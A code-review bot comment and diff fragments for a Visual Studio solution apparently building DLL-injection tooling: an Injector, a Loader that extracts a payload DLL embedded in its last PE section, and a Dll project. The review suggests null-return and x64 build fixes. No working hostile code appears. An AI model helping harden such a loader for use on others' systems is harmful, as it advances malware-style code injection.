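Review bot: ExtractDllFile returns nothing when either header signature check fails, so the caller in loader.cpp receives an indeterminate pointer on that path; `return NULL;` at the end of the function, and documenting that null return in tools.h, is the minimal fix. The `dll_section != ERROR` test compares a pointer computed by arithmetic from `first_section` against zero and is always true, so it guards nothing — the real precondition, that the image has at least one section and that its last section holds the payload with `Misc.VirtualSize` as its exact length, is undocumented and should be stated in a comment on the function. The `__asm` block in GetImageBase is only accepted by the 32-bit MSVC compiler, so this file cannot build under the x64 configurations that Loader.vcxproj declares; note that limitation in the header or remove those configurations.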
+9
@@ -0,0 +1,9 @@
#pragma once
#include <Windows.h>
#define RtlOffsetToPointer(Module, Pointer) PBYTE(PBYTE(Module) + DWORD(Pointer))
namespace Tools {
PVOID GetImageBase();
PBYTE ExtractDllFile(PBYTE module_base, PDWORD module_size);
}
+19 -9
@@ -5,7 +5,9 @@ VisualStudioVersion = 17.6.33815.320
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Injector", "Injector\Injector.vcxproj", "{9C556697-73D5-47E2-908C-B285CB253CC6}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "FunDLL\FunDLL.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}"
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{81F05638-72B8-41DA-B80A-4F292961D9A1}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll", "Dll\Dll.vcxproj", "{0299D361-D3F7-419A-AB93-FB36642C97FA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -23,14 +25,22 @@ Global
{9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x64.Build.0 = Release|x64
{9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.ActiveCfg = Release|Win32
{9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.Build.0 = Release|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.ActiveCfg = Debug|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.Build.0 = Debug|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.ActiveCfg = Debug|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.Build.0 = Debug|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.ActiveCfg = Release|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.Build.0 = Release|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.ActiveCfg = Release|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.Build.0 = Release|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.ActiveCfg = Debug|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.Build.0 = Debug|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.ActiveCfg = Debug|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.Build.0 = Debug|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.ActiveCfg = Release|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.Build.0 = Release|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.ActiveCfg = Release|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE